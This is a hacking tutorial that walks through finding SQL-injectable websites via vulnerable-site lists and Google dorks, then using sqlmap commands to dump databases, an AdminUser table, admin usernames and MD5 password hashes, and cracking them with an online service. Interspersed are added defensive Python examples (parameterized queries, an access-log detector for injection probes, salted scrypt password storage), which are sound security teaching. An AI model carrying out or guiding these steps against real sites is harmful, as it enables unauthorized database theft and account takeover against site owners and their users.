
Hack website and Take Database over using SQLMAP.

[Image: injection]

What is SQLMAP?

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester, and a broad range of switches ranging from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

SQLMAP is pre-installed on Kali Linux.

It has many more features; in this article we will see how you can take over a database with SQLMAP. If you want to do extra research on SQLMAP and its features, visit the official website.

Before using SQLMAP we need a vulnerable website. Here is the latest list of vulnerable websites; pick a URL from there. Or you can use Google dorking techniques to find vulnerable websites.

Paste the URL into your browser. Let's say you have pasted the following URL:
http://www.demo.com/form.php?id=5
Now, to check whether the website is vulnerable to injection, add a single quotation mark ' at the end of the URL. Your address should now look like this:
http://www.yourtarget.com/form.php?id=5'

If it returns a database error as shown in the picture below, the website is vulnerable to injection.

[Image: error in the database]
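Why the trailing quote produces that error, and what the fix looks like on the server side, as an added example that is not part of the original article. It uses an in-memory SQLite table as a stand-in for the page's form.php?id=5 lookup (the products schema and row values are assumptions); the vulnerable function splices the parameter into the SQL text, the safe one binds it.

```python
import sqlite3

# Constructed stand-in for the page's form.php?id=5 lookup: an in-memory
# "products" table (assumed schema, not from the article's target).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?)",
                     [(5, "widget"), (6, "gadget")])
    return conn


def lookup_vulnerable(conn, raw_id):
    """Builds the SQL text by concatenating the request parameter.

    The parameter becomes part of the statement, so id=5' leaves an
    unbalanced quote and the database raises a syntax error; that error
    is what the single-quote test in the article looks for."""
    sql = "SELECT name FROM products WHERE id = '" + raw_id + "'"
    try:
        return {"rows": conn.execute(sql).fetchall(), "error": None}
    except sqlite3.Error as exc:
        return {"rows": [], "error": str(exc)}


def lookup_parameterized(conn, raw_id):
    """Binds the parameter instead of splicing it into the SQL text.

    The driver sends the value separately from the statement, so a quote
    is just a character in the data: no error, and no way for the value
    to change the query's structure."""
    try:
        rows = conn.execute("SELECT name FROM products WHERE id = ?",
                            (raw_id,)).fetchall()
        return {"rows": rows, "error": None}
    except sqlite3.Error as exc:
        return {"rows": [], "error": str(exc)}


def demo():
    """Runs both lookups against the normal id and the quote probe."""
    conn = make_db()
    return {
        "vuln_normal": lookup_vulnerable(conn, "5"),
        "vuln_probe": lookup_vulnerable(conn, "5'"),
        "safe_normal": lookup_parameterized(conn, "5"),
        "safe_probe": lookup_parameterized(conn, "5'"),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name:12s} rows={result['rows']} error={result['error']}")
```

The parameterized version returns no rows for the probe instead of an error, which is exactly the silence that gives a scanner nothing to fingerprint. Turning off error display on the web server hides the message but not the flaw; only binding the parameter removes it.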

Once you have your target ready, open your terminal and type the following command. It displays all the options that you can use with SQLMAP; go through it.

root@seven:~# sqlmap -h
Usage: python sqlmap [options]
Options:
  -h, --help            Show basic help message and exit
  -hh                   Show advanced help message and exit
  --version             Show program's version number and exit
  -v VERBOSE            Verbosity level: 0-6 (default 1)
Target:
    At least one of these options has to be provided to define the
    target(s)
    -u URL, --url=URL   Target URL (e.g. "http://www.site.com/vuln.php?id=1")
    -g GOOGLEDORK       Process Google dork results as target URLs
  Request:
      These options can be used to specify how to connect to the target URL
    --data=DATA         Data string to be sent through POST
    --cookie=COOKIE     HTTP Cookie header value
    --random-agent      Use randomly selected HTTP User-Agent header value
    --proxy=PROXY       Use a proxy to connect to the target URL
    --tor               Use Tor anonymity network
    --check-tor         Check to see if Tor is used properly
  Injection:
    These options can be used to specify which parameters to test for,
    provide custom injection payloads and optional tampering scripts
   -p TESTPARAMETER    Testable parameter(s)
   --dbms=DBMS         Force back-end DBMS to this value
   -a, --all           Retrieve everything
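The help output above lists --random-agent, --proxy and --tor, which change how a run looks from the server's side. The other half of this picture is what a run leaves in the web server's access log, so here is an added example, not from the article or from the sqlmap project, that scans combined-format log lines for the single-quote probe, boolean and UNION payloads, and sqlmap's default User-Agent. The log lines are constructed samples (documentation-range addresses, the article's form.php path); the version string in the User-Agent is illustrative.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample lines in Apache/nginx "combined" format. Addresses are
# documentation ranges and the paths mirror the article's form.php?id=5.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2024:12:00:01 +0000] "GET /form.php?id=5 HTTP/1.1" 200 1043 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2024:12:00:02 +0000] "GET /form.php?id=5%27 HTTP/1.1" 500 512 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Mar/2024:12:00:05 +0000] "GET /form.php?id=5 HTTP/1.1" 200 1043 "-" "sqlmap/1.7.2#stable (https://sqlmap.org)"
203.0.113.9 - - [10/Mar/2024:12:00:06 +0000] "GET /form.php?id=5%20AND%201%3D1 HTTP/1.1" 200 1043 "-" "Mozilla/5.0 (Windows NT 10.0)"
198.51.100.4 - - [10/Mar/2024:12:01:00 +0000] "GET /form.php?id=6 HTTP/1.1" 200 987 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"'
)

# Query-string content that a legitimate numeric id never contains.
SQLI_PATTERNS = [re.compile(p, re.IGNORECASE) for p in (
    r"'",                               # the single-quote probe from the article
    r"\b(AND|OR)\b\s*\d+\s*=\s*\d+",    # boolean tautology / contradiction
    r"\bUNION\b.*\bSELECT\b",
    r"information_schema",              # MySQL metadata, as enumerated by --dbs
    r"\b(SLEEP|BENCHMARK)\s*\(",        # time-based probes
)]


def parse_line(line):
    """Returns the fields of one combined-format line, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    # parse_qsl percent-decodes, so %27 becomes ' before matching.
    entry["params"] = dict(parse_qsl(urlsplit(entry["path"]).query,
                                     keep_blank_values=True))
    return entry


def classify(entry):
    """Lists the reasons one request looks like SQL injection testing."""
    reasons = []
    if entry["ua"].lower().startswith("sqlmap"):
        reasons.append("sqlmap default User-Agent")
    for name, value in entry["params"].items():
        for pat in SQLI_PATTERNS:
            if pat.search(value):
                reasons.append(f"pattern {pat.pattern!r} in parameter {name}={value!r}")
                break
    if reasons and entry["status"] == "500":
        reasons.append("HTTP 500 after suspicious input: error-based probe succeeded")
    return reasons


def scan_log(text):
    """Returns one finding per suspicious line plus a per-client tally."""
    findings, by_ip = [], {}
    for line in text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = classify(entry)
        if reasons:
            findings.append({"ip": entry["ip"], "ts": entry["ts"],
                             "path": entry["path"], "reasons": reasons})
            by_ip[entry["ip"]] = by_ip.get(entry["ip"], 0) + 1
    return findings, by_ip


if __name__ == "__main__":
    findings, by_ip = scan_log(SAMPLE_LOG)
    for f in findings:
        print(f["ip"], f["path"], "; ".join(f["reasons"]))
    print("suspicious requests per client:", by_ip)
```

Two caveats follow directly from the option list: --random-agent removes the User-Agent signal, so the parameter-content checks and the per-client request count are the signals to rely on, and --data moves the tested parameter into the POST body, which a default access log does not record, so body logging or a WAF log is needed to see those runs at all.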

Grab all the databases

The first thing we need to do is look for all the available databases on the website. The syntax goes like this:

Syntax:

sqlmap -u [URL] --dbs

-u :   the target URL.
--dbs :   enumerates the DBMS databases; it fetches all the databases behind the website.

Complete command:

root@seven:~# sqlmap -u www.yourtarget.com/index.php?id=31 --dbs 
[Image: results]

When sqlmap asks "it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes?", just press y. sqlmap has already detected the back-end database, in this case MySQL, so press y to skip further testing. On the very next prompt, press y too.

Wait a few minutes until it finishes. On successful completion it will list all the databases behind the website.

[Image: all the databases]

The information_schema database is a standard database on every MySQL server, so ignore it.
We are interested in the other (guru) database. Now choose the database that you want to exploit; I am going to exploit guru.

Extract Tables inside database

Once you have chosen the database that you want to exploit, we need to look at its tables.

You have to give two parameters:

Syntax:
sqlmap -u [URL] -D Database_name --tables
  1. -D :   selects the database; give the name of the database that you want to exploit.
  2. --tables : extracts the tables inside that database.

Complete Command:

root@seven:~# sqlmap -u  http://target.com/product_detail.php?ID=41  -D guru --tables

Replace Database_name with the database that you want to exploit.

[Image: fetched tables]

As you can see from the picture below, we have fetched the tables. There are plenty of tables, but we are interested in AdminUser.

[Image: admin area]

Extract columns

The next thing you will be interested in is the columns of a table. Now that we have the table we want to exploit, we have to extract its columns:

  1. -D :    the database name.
  2. -T :    the table name.
  3. --columns : retrieves the columns inside the table.


Complete command:

root@seven:~# sqlmap -u  http://target.com/product_detail.php?ID=41  -D guru -T AdminUser --columns 

[Image: fetch columns]

When it finishes it displays all the columns inside the table, as you can see in the picture above. Now we know our columns. Go through them; you may find interesting columns like username, password and email. I am going to access the USR_Password column first. We will extract the usernames stored inside the USR_Username column. You need to give the following options:

  1. -D :     the database.
  2. -T :     the table.
  3. -C :     the column.
  4. --dump :    extracts the data inside the column.

Full command:

root@seven:~# sqlmap -u  http://target.com/product_detail.php?ID=41  -D guru -T AdminUser -C USR_Username --dump 
[Image: usernames]

We have found two admin accounts here. Now we need the password.

If there are many users this takes time, so to speed up information retrieval we can use the --threads option.

root@seven:~# sqlmap -u  http://target.com/product_detail.php?ID=41  -D guru -T AdminUser -C USR_Username --dump  --threads 7

It's time to see the password column. The command stays the same except for the column name, so replace USR_Username with USR_Password.

root@seven:~# sqlmap -u  http://target.com/product_detail.php?ID=41  -D guru -T AdminUser -C USR_Password  --dump 
[Image: dump password]

Of course the password will not be presented in plain text, so we have to crack the password hash, as you can see in the picture below. You will be asked whether to crack the password using a dictionary-based attack; press y and hit enter.

[Image: press y]

Now press 1 to use the default dictionary; if you have your own custom dictionary file then specify its path. Once you press 1 it will start cracking the hashes. In most cases the hashes will not be cracked with the default dictionary file.

[Image: press 1]

It did not find any passwords, so we have to look for other alternatives. There are lots of online MD5 decrypters.

[Image: hashes]

So make a note of your hashes. We will use the hashkiller website to crack the hash.

[Image: note hashes]

Go to hashkiller to crack the hash. Paste the hash on the right side at the bottom, fill in the captcha and click the submit button. The cracked hash will be shown next to the hash on the right side; as you can see in the picture below, I have cracked my hash successfully.

[Image: hashkiller]
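The dumped hashes could be recovered by an online lookup because the application stored unsalted MD5: the same password always produces the same 32-hex-digit value, so one precomputed table answers for every user. As an added example, not from the article or any project it mentions, the code below contrasts that scheme with salted scrypt storage and shows how a legacy table can be migrated on each successful login. The scrypt parameters and the scrypt$salt$digest record format are assumptions made for this example.

```python
import hashlib
import hmac
import os

# Parameters for hashlib.scrypt (assumed values for this example; about
# 16 MiB of memory per hash, which fits OpenSSL's default maxmem).
SCRYPT_N, SCRYPT_R, SCRYPT_P, DKLEN = 2 ** 14, 8, 1, 32


def md5_store(password):
    """The scheme behind the dumped USR_Password column: unsalted MD5.

    Deterministic and fast, so every user with the same password gets the
    same hash and a precomputed lookup (what the online crackers do)
    reverses it."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def scrypt_store(password, salt=None):
    """Per-user random salt plus a memory-hard KDF, stored as scrypt$salt$digest."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.scrypt(password.encode("utf-8"), salt=salt,
                            n=SCRYPT_N, r=SCRYPT_R, p=SCRYPT_P, dklen=DKLEN)
    return "scrypt$" + salt.hex() + "$" + digest.hex()


def scrypt_verify(password, stored):
    """Recomputes with the stored salt and compares in constant time."""
    try:
        algo, salt_hex, digest_hex = stored.split("$")
    except ValueError:
        return False
    if algo != "scrypt":
        return False
    digest = hashlib.scrypt(password.encode("utf-8"), salt=bytes.fromhex(salt_hex),
                            n=SCRYPT_N, r=SCRYPT_R, p=SCRYPT_P, dklen=DKLEN)
    return hmac.compare_digest(digest.hex(), digest_hex)


def is_legacy_md5(stored):
    """True for a bare 32-hex-digit value, i.e. a row still in the old format."""
    return len(stored) == 32 and all(c in "0123456789abcdef" for c in stored.lower())


def login(password, stored):
    """Checks a password against either format.

    Returns (ok, new_stored): on a successful login against a legacy MD5 row
    the caller gets a fresh scrypt value to write back, so the table migrates
    one account at a time without forcing resets."""
    if is_legacy_md5(stored):
        if hmac.compare_digest(md5_store(password), stored.lower()):
            return True, scrypt_store(password)
        return False, None
    return scrypt_verify(password, stored), None


def demo():
    """Same password for two users: MD5 collides, scrypt does not."""
    alice, bob = scrypt_store("secret"), scrypt_store("secret")
    ok, migrated = login("secret", md5_store("secret"))
    return {
        "md5_identical": md5_store("secret") == md5_store("secret"),
        "scrypt_identical": alice == bob,
        "both_verify": scrypt_verify("secret", alice) and scrypt_verify("secret", bob),
        "wrong_rejected": scrypt_verify("wrong", alice),
        "legacy_login_ok": ok,
        "migrated_format": migrated is not None and migrated.startswith("scrypt$"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key:18s} {value}")
```

With a per-user salt the lookup-table shortcut disappears and each guess costs a full scrypt evaluation against one account, which is what turns "paste the hash into a website" back into real work. The migration path matters because an injection that dumps the table tomorrow exposes whatever format the rows are in today.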